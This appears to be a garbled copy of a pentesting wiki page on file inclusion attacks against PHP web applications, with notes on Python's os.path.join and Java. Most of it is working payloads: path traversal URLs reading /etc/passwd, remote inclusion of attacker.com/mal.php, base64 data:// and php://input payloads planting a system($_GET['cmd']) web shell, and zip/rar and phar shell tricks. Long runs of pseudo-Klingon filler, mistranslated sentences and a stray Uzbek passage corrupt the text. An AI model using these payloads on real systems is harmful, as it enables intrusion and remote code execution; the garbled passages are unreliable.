QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Seg

http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Maintain the initial path: http://example.com/index.php?page=/var/www/../../etc/passwd
http://example.com/index.php?page=PhP://filter

Remote File Inclusion

In php this is disable by default because allow_url_include is Off. It must be On for it to work, and in that case you could include a PHP file from your server and get RCE:

qarDaS Qochbe' File Inclusion

php DaH jImej allow_url_include Off DaH jImej. On DaH jImej, 'ej vaj RCE ghaH include PHP file vay' server.

http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php

ghobe' allow_url_include On vaj PHP filtering external webpages access reason some If, according to this post, example use could you data protocol with base64 decode and RCE egt code PHP b64 a:

{% code overflow="wrap" %}

PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt

{% endcode %}

{% hint style="info" %} In the previous code, the final +.txt was added because the attacker needed a string that ended in .txt, so the string ends with it and after the b64 decode that part will return just junk and the real PHP code will be included (and therefore, executed). {% endhint %}

Another example not using the php:// protocol would be:

{% code overflow="wrap" %}

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt

{% endcode %}

Python Root element

In python in a code like this one:

# file_name is controlled by a user
os.path.join(os.getcwd(), "public", file_name)

ghItlhvam file_name absolute path user cha'logh 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' **

os.path.join(os.getcwd(), "public", "/etc/passwd")
'/etc/passwd'

It is the intended behaviour according to the docs:

If a component is an absolute path, all previous components are thrown away and joining continues from the absolute path component.

Java List Directories

It looks like if you have a Path Traversal in Java and you ask for a directory instead of a file, a listing of the directory is returned. This won't be happening in other languages (afaik).

Top 25 parameters

Heres list of top 25 parameters that could be vulnerable to local file inclusion (LFI) vulnerabilities (from link):

?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}

LFI / RFI using PHP wrappers & protocols

php://filter

PHP filters allow perform basic modification operations on the data before being it's read or written. There are 5 categories of filters:

  • String Filters:
  • string.rot13
  • string.toupper
  • string.tolower
  • string.strip_tags: Remove tags from the data (everything between "<" and ">" chars)
  • Note that this filter has disappear from the modern versions of PHP
  • Conversion Filters
  • convert.base64-encode
  • convert.base64-decode
  • convert.quoted-printable-encode
  • convert.quoted-printable-decode
  • convert.iconv.* : Transforms to a different encoding(convert.iconv.<input_enc>.<output_enc>) . To get the list of all the encodings supported run in the console: iconv -l

{% hint style="warning" %} Abusing the convert.iconv.* conversion filter you can generate arbitrary text, which could be useful to write arbitrary text or make a function like include process arbitrary text. For more info check LFI2RCE via php filters. {% endhint %}

  • Compression Filters
  • zlib.deflate: Compress the content (useful if exfiltrating a lot of info)
  • zlib.inflate: Decompress the data
  • Encryption Filters
  • mcrypt.* : Deprecated
  • mdecrypt.* : Deprecated
  • Other Filters
  • Running in php var_dump(stream_get_filters()); you can find a couple of unexpected filters:
  • consumed
  • dechunk: reverses HTTP chunked encoding
  • convert.*
# String Filters
## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd
echo file_get_contents("php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd");
## Same chain without the "|" char
echo file_get_contents("php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd");
## string.string_tags example
echo file_get_contents("php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php php code; ?>lalalala");

# Conversion filter
## B64 decode
echo file_get_contents("php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8=");
## Chain B64 encode and decode
echo file_get_contents("php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd");
## convert.quoted-printable-encode example
echo file_get_contents("php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=");
=C2=A3hellooo=3D
## convert.iconv.utf-8.utf-16le
echo file_get_contents("php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=");

# Compresion Filter
## Compress + B64
echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd");
readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the data locally
# note that PHP protocol is case-inselective (that's mean you can use "PhP://" and any other varient)

{% hint style="warning" %} "php://filter" qo'lu katta kichik harflardan iborat bo'lib, harf katta kichiklikdan tashqari qabul qilinadi. {% endhint %}

php://fd

Ushbu qo'llaydigan fayl deskrptorlarga kirish imkonini beradi. Ochilgan fayllarning tarkibini eksfiltratsiya qilish uchun potentsial ravishda foydali bo'lishi mumkin:

echo file_get_contents("php://fd/3");
$myfile = fopen("/etc/passwd", "r");

php://stdin, php://stdout jev php://stderr vItlhutlh file descriptors 0, 1, je 2 ghaH (ghaH 'attack' vItlhutlh) ghaH.

zip:// je rar://

Zip je Rar file PHPShell vItlhutlh je access.
rar protocol ghaH specifically activated ghaH.

echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php

# To compress with rar
rar a payload.rar payload.php;
mv payload.rar shell.jpg;
rm payload.php
http://example.com/index.php?page=rar://shell.jpg%23payload.php

data://

Description

The data:// protocol allows you to include data directly into a web page or script. It is commonly used to embed images, audio files, or other types of data within HTML documents.

Vulnerability

When a web application uses user-supplied input to construct a file path without proper validation or sanitization, it can lead to a file inclusion vulnerability. An attacker can manipulate the input to include arbitrary files from the server's filesystem, including sensitive files containing passwords, configuration files, or even source code.

Exploitation

To exploit a file inclusion vulnerability using the data:// protocol, an attacker can craft a malicious payload that includes the desired file. The payload can be injected into a vulnerable parameter, such as a URL query parameter or a file path.

For example, if the vulnerable application constructs a file path like this:

$file = $_GET['file'];
$path = "/var/www/html/files/" . $file;

An attacker can manipulate the file parameter to include arbitrary files:

http://example.com/page.php?file=data://text/plain;base64,SGVsbG8gV29ybGQhCg==

In this example, the attacker includes the contents of a text file encoded in base64. The data:// protocol allows the attacker to specify the MIME type and encoding of the data being included.

Prevention

To prevent file inclusion vulnerabilities, it is important to validate and sanitize all user-supplied input used to construct file paths. Avoid using user input directly in file paths and instead use a whitelist approach to only allow specific files or directories to be included.

Additionally, consider implementing access controls to restrict the files that can be included and ensure that sensitive files are not accessible through the web server.

References

http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
http://example.net/?page=data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

ghItlhvam 'allow_url_open' 'ej 'allow_url_include' php configurations 'e' tlhIngan 'e' qay'be' 'e' 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS 'eS **'

http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls

input://

QaD jImejnISmoHmeH POST parameters vItlhutlh.

curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"

phar://

A .phar file can be utilized to execute PHP code when a web application leverages functions such as include for file loading. The PHP code snippet provided below demonstrates the creation of a .phar file:

phar://

.phar file vItlhutlhlaHbe'chugh web application 'e' vItlhutlhlaHbe'chugh include vItlhutlhlaHbe'chugh file loading vaj 'e' vItlhutlhlaHbe'chugh PHP code 'e' vItlhutlhlaHbe'chugh. 'e' vItlhutlhlaHbe'chugh .phar file creation vaj 'e' vItlhutlhlaHbe'chugh PHP code snippet vItlhutlhlaHbe'chugh:

<?php
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); system("ls"); ?>');
$phar->stopBuffering();

To compile the .phar file, the following command should be executed:

phar jcvf <output_file>.phar <input_file>

This command will create a compressed .phar file from the specified <input_file>, and save it as <output_file>.phar.

php --define phar.readonly=0 create_path.php

Upon execution, a file named test.phar will be created, which could potentially be leveraged to exploit Local File Inclusion (LFI) vulnerabilities.

In cases where the LFI only performs file reading without executing the PHP code within, through functions such as file_get_contents(), fopen(), file(), file_exists(), md5_file(), filemtime(), or filesize(), exploitation of a deserialization vulnerability could be attempted. This vulnerability is associated with the reading of files using the phar protocol.

For a detailed understanding of exploiting deserialization vulnerabilities in the context of .phar files, refer to the document linked below:

Phar Deserialization Exploitation Guide

{% content-ref url="phar-deserialization.md" %} phar-deserialization.md {% endcontent-ref %}

More protocols

Check more possible protocols to include here:

  • php://memory and php://temp — Write in memory or in a temporary file (not sure how this can be useful in a file inclusion attack)
  • file:// — Accessing local filesystem
  • http:// — Accessing HTTP(s) URLs
  • ftp:// — Accessing FTP(s) URLs
  • zlib:// — Compression Streams
  • glob:// — Find pathnames matching pattern (It doesn't return nothing printable, so not really useful here)
  • ssh2:// — Secure Shell 2
